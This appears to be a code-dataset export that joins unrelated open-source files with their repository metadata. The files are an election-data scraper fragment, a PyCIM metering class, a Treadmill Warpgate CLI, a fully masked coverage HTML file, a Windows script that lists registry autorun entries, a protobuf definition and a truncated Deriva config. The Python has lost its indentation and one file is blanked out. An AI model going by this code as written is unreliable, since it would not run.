uik_no = uik_option.select("text()").extract()[0].strip()[:4]
if uik_no not in uiks:
print uik_no
continue
url = uik_option.select("@value").extract()[0]
for param in url.split('?')[1].split('&'):
param_name, param_value = param.split('=')
if param_name in ('root', 'tvd'):
uiks[uik_no][param_name] = int(param_value)
location = Location(region=foreign_countries, tik=countries_by_id[uiks[uik_no]['tik']],
name=uik_no, region_name=FOREIGN_NAME, region_code=FOREIGN_CODE,
address=uiks[uik_no]['address'], tvd=uiks[uik_no]['tvd'],
root=uiks[uik_no]['root'], data='{}')
location.save()
i += 1
print_progress(i, 350)
| [
"sergkop@gmail.com"
] | sergkop@gmail.com |
6d9273b5b0345cc09ca089ba02ca5e9fd109dddc | 2d4380518d9c591b6b6c09ea51e28a34381fc80c | /CIM16/IEC61968/Metering/ComFunction.py | 5e3b93609661efbb5adef5b2bc8c60c312ecd3ea | [
"MIT"
] | permissive | fran-jo/PyCIM | 355e36ae14d1b64b01e752c5acd5395bf88cd949 | de942633d966bdf2bd76d680ecb20517fc873281 | refs/heads/master | 2021-01-20T03:00:41.186556 | 2017-09-19T14:15:33 | 2017-09-19T14:15:33 | 89,480,767 | 0 | 1 | null | 2017-04-26T12:57:44 | 2017-04-26T12:57:44 | null | UTF-8 | Python | false | false | 3,308 | py | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM16.IEC61968.Metering.EndDeviceFunction import EndDeviceFunction
class ComFunction(EndDeviceFunction):
"""Communication function of communication equipment or a device such as a meter.Communication function of communication equipment or a device such as a meter.
"""
def __init__(self, amrRouter='', amrAddress='', twoWay=False, *args, **kw_args):
"""Initialises a new 'ComFunction' instance.
@param amrRouter: Communication ID number (e.g. port number, serial number, data collector ID, etc.) of the parent device associated to this AMR module. Note: If someone swaps out a meter, they may inadvertently disrupt the AMR system. Some technologies route readings from nearby meters through a common collection point on an electricity meter. Removal of such a meter disrupts AMR for numerous nearby meters.
@param amrAddress: Communication ID number (e.g. serial number, IP address, telephone number, etc.) of the AMR module which serves this meter.
@param twoWay: True when the AMR module can both send and receive messages. Default is false (i.e., module can only send).
"""
#: Communication ID number (e.g. port number, serial number, data collector ID, etc.) of the parent device associated to this AMR module. Note: If someone swaps out a meter, they may inadvertently disrupt the AMR system. Some technologies route readings from nearby meters through a common collection point on an electricity meter. Removal of such a meter disrupts AMR for numerous nearby meters.
self.amrRouter = amrRouter
#: Communication ID number (e.g. serial number, IP address, telephone number, etc.) of the AMR module which serves this meter.
self.amrAddress = amrAddress
#: True when the AMR module can both send and receive messages. Default is false (i.e., module can only send).
self.twoWay = twoWay
super(ComFunction, self).__init__(*args, **kw_args)
_attrs = ["amrRouter", "amrAddress", "twoWay"]
_attr_types = {"amrRouter": str, "amrAddress": str, "twoWay": bool}
_defaults = {"amrRouter": '', "amrAddress": '', "twoWay": False}
_enums = {}
_refs = []
_many_refs = []
| [
"fran_jo@hotmail.com"
] | fran_jo@hotmail.com |
f82ef33cd4738f58765f3bcd648b1aa0d96dccc1 | 7f0c02b3eef636cc382484dd8015207c35cc83a8 | /lib/python/treadmill/sproc/warpgate.py | 95edca71b68bbd55ec900b55895d40d054d10f07 | [
"Apache-2.0"
] | permissive | ceache/treadmill | 4efa69482dafb990978bfdcb54b24c16ca5d1147 | 26a1f667fe272ff1762a558acfd66963494020ca | refs/heads/master | 2021-01-12T12:44:13.474640 | 2019-08-20T23:22:37 | 2019-08-20T23:22:37 | 151,146,942 | 0 | 0 | Apache-2.0 | 2018-10-01T19:31:51 | 2018-10-01T19:31:51 | null | UTF-8 | Python | false | false | 1,587 | py | """Warpgate client CLI.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import click
from treadmill import cli
from treadmill.warpgate import client
_LOGGER = logging.getLogger(__name__)
def init():
"""Top level command handler."""
@click.command()
@click.option('--policy-servers', type=cli.LIST,
required=True,
help='Warpgate policy servers')
@click.option('--service-principal', type=str,
default='host',
help='Warpgate service principal.')
@click.option('--policy', type=str, required=True,
envvar='WARPGATE_POLICY',
help='Warpget policy to use')
@click.option('--tun-dev', type=str, required=True,
help='Device to use when establishing tunnels.')
@click.option('--tun-addr', type=str, required=False,
help='Local IP address to use when establishing tunnels.')
def warpgate(policy_servers, service_principal, policy, tun_dev, tun_addr):
"""Run warpgate connection manager.
"""
_LOGGER.info(
'Launch client => %s, tunnel: %s[%s], policy: %s, principal: %s',
policy_servers,
tun_dev, tun_addr,
policy,
service_principal,
)
# Never exits
client.run_client(
policy_servers, service_principal, policy,
tun_dev, tun_addr
)
return warpgate
| [
"ceache@users.noreply.github.com"
] | ceache@users.noreply.github.com |
78b511df1413545c20fdc14e03b3e4029917fce7 | 492d3e666b87eff971628a74fe13facde01e2949 | /htmlcov/_python_Django_My Projects_student-portal_Lib_site-packages_django___init___py.html.py | e61033f22d45a3153fac5dd081bb80af1fa7fa18 | [] | no_license | OmarFateh/Student-Portal | 42050da15327aa01944dc79b5e00ca34deb51531 | 167ffd3a4183529c0cbc5db4ab232026711ea915 | refs/heads/master | 2023-06-13T01:03:16.475588 | 2021-07-08T11:09:09 | 2021-07-08T11:09:09 | 382,895,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,063 | py | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXX
XXXXX XXXXXXXXXX XXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX
XXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XXX XXXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XX XXXXXXXXXXXXXXXXXXXXXXX XX XXXX XXXXXXXX
XXXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXXX XXXXXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXX XXXXXXXXXXX XXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXX XX XXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXX XXXXX XXXXXXXXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXX XXX XXXXXXXX XXXXX XXXXXXX XX X XXXX XXXXXX XX XXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXX XXXXXXXXX XXXXXXXXX XXXXXXX XXX XXXXXXXX XXX XXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXX XXX XXXXXXXXXXXX XXXXXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXX
XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XX XXXXXXXXXX XXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXXXXX
XXXXXXX
| [
"66747309+OmarFateh@users.noreply.github.com"
] | 66747309+OmarFateh@users.noreply.github.com |
2b4389ecb7063df9de2c1a85552f21e19513c7d6 | da99b8e2a22318f1cafb0c78adb17c8fdebe01df | /PythonBookAdditional/第12章 Windows系统编程/code/CheckAndViewAutoRunsInSystem.py | 63a8ea52863a56fe57da939232caf9e2e9061c8b | [
"MIT"
] | permissive | lsjsss/PythonClass | f185873113d54ed6ae9b3ccc22cc5a71bf8f611d | 0d38d2ca4d14d5e0e2062e22ae2dbbefea279179 | refs/heads/master | 2023-02-18T13:43:32.453478 | 2023-02-08T07:17:09 | 2023-02-08T07:17:09 | 247,711,629 | 0 | 0 | null | 2022-04-25T07:03:53 | 2020-03-16T13:38:15 | Python | UTF-8 | Python | false | false | 1,579 | py | #check and view autoruns in the system
from win32api import *
from win32con import *
def GetValues(fullname):
name=str.split(fullname,'\\',1)
try:
if name[0]=='HKEY_LOCAL_MACHINE':
key=RegOpenKey(HKEY_LOCAL_MACHINE,name[1],0,KEY_READ)
elif name[0]=='HKEY_CURRENT_USER':
key=RegOpenKey(HKEY_CURRENT_USER,name[1],0,KEY_READ)
elif name[0]=='HKEY_CURRENT_ROOT':
key=RegOpenKey(HKEY_CURRENT_ROOT,name[1],0,KEY_READ)
elif name[0]=='HKEY_CURRENT_CONFIG':
key=RegOpenKey(HKEY_CURRENT_CONFIG,name[1],0,KEY_READ)
elif name[0]=='HKEY_USERS':
key=RegOpenKey(HKEY_USERS,name[1],0,KEY_READ)
else:
print('Error, no key named ',name[0])
info = RegQueryInfoKey(key)
for i in range(0,info[1]):
ValueName = RegEnumValue(key,i)
print(str.ljust(ValueName[0],20),ValueName[1])
RegCloseKey(key)
except BaseException as e:
print('Sth is wrong')
print(e)
if __name__=='__main__':
KeyNames=['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run',
'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx',
'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce']
for KeyName in KeyNames:
print(KeyName)
GetValues(KeyName)
| [
"lsjsss@live.cn"
] | lsjsss@live.cn |
6e2dd713422373ca3f97052be06e0a16981f04f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform/v1/schema/predict/instance_v1/types/video_classification.py | 2a302fc41f2bfb1ed6a3bebcbc1e33f705293c69 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.cloud.aiplatform.v1.schema.predict.instance',
manifest={
'VideoClassificationPredictionInstance',
},
)
class VideoClassificationPredictionInstance(proto.Message):
r"""Prediction input format for Video Classification.
Attributes:
content (str):
The Google Cloud Storage location of the
video on which to perform the prediction.
mime_type (str):
The MIME type of the content of the video.
Only the following are supported: video/mp4
video/avi video/quicktime
time_segment_start (str):
The beginning, inclusive, of the video's time
segment on which to perform the prediction.
Expressed as a number of seconds as measured
from the start of the video, with "s" appended
at the end. Fractions are allowed, up to a
microsecond precision.
time_segment_end (str):
The end, exclusive, of the video's time
segment on which to perform the prediction.
Expressed as a number of seconds as measured
from the start of the video, with "s" appended
at the end. Fractions are allowed, up to a
microsecond precision, and "inf" or "Infinity"
is allowed, which means the end of the video.
"""
content = proto.Field(proto.STRING, number=1)
mime_type = proto.Field(proto.STRING, number=2)
time_segment_start = proto.Field(proto.STRING, number=3)
time_segment_end = proto.Field(proto.STRING, number=4)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
8a9a097acec7f7248d2a0353f0e6c921b0e9d855 | 7298d1692c6948f0880e550d6100c63a64ce3ea1 | /deriva-annotations/catalog1/catalog-configs/Vocab/ihm_external_reference_info_reference_type_term.py | bfd555a03816d7b8e5783424965c8f5f426649a4 | [] | no_license | informatics-isi-edu/protein-database | b7684b3d08dbf22c1e7c4a4b8460248c6f0d2c6d | ce4be1bf13e6b1c22f3fccbb513824782609991f | refs/heads/master | 2023-08-16T10:24:10.206574 | 2023-07-25T23:10:42 | 2023-07-25T23:10:42 | 174,095,941 | 2 | 0 | null | 2023-06-16T19:44:43 | 2019-03-06T07:39:14 | Python | UTF-8 | Python | false | false | 6,342 | py | import argparse
from deriva.core import ErmrestCatalog, AttrDict, get_credential, DerivaPathError
from deriva.utils.catalog.components.deriva_model import DerivaCatalog
import deriva.core.ermrest_model as em
from deriva.core.ermrest_config import tag as chaise_tags
from deriva.utils.catalog.manage.update_catalog import CatalogUpdater, parse_args
groups = {
'pdb-reader': 'https://auth.globus.org/8875a770-3c40-11e9-a8c8-0ee7d80087ee',
'pdb-writer': 'https://auth.globus.org/c94a1e5c-3c40-11e9-a5d1-0aacc65bfe9a',
'pdb-admin': 'https://auth.globus.org/0b98092c-3c41-11e9-a8c8-0ee7d80087ee',
'pdb-curator': 'https://auth.globus.org/eef3e02a-3c40-11e9-9276-0edc9bdd56a6',
'isrd-staff': 'https://auth.globus.org/176baec4-ed26-11e5-8e88-22000ab4b42b'
}
table_name = 'ihm_external_reference_info_reference_type_term'
schema_name = 'Vocab'
column_annotations = {
'RCT': {
chaise_tags.display: {
'name': 'Creation Time'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'RMT': {
chaise_tags.display: {
'name': 'Last Modified Time'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'RCB': {
chaise_tags.display: {
'name': 'Created By'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'RMB': {
chaise_tags.display: {
'name': 'Modified By'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'ID': {},
'URI': {},
'Name': {},
'Description': {},
'Synonyms': {},
'Owner': {}
}
column_comment = {
'ID': 'The preferred Compact URI (CURIE) for this term.',
'URI': 'The preferred URI for this term.',
'Name': 'The preferred human-readable name for this term.',
'Description': 'A longer human-readable description of this term.',
'Synonyms': 'Alternate human-readable names for this term.',
'Owner': 'Group that can update the record.'
}
column_acls = {}
column_acl_bindings = {}
column_defs = [
em.Column.define(
'ID',
em.builtin_types['ermrest_curie'],
nullok=False,
default='PDB:{RID}',
comment=column_comment['ID'],
),
em.Column.define(
'URI',
em.builtin_types['ermrest_uri'],
nullok=False,
default='/id/{RID}',
comment=column_comment['URI'],
),
em.Column.define(
'Name', em.builtin_types['text'], nullok=False, comment=column_comment['Name'],
),
em.Column.define(
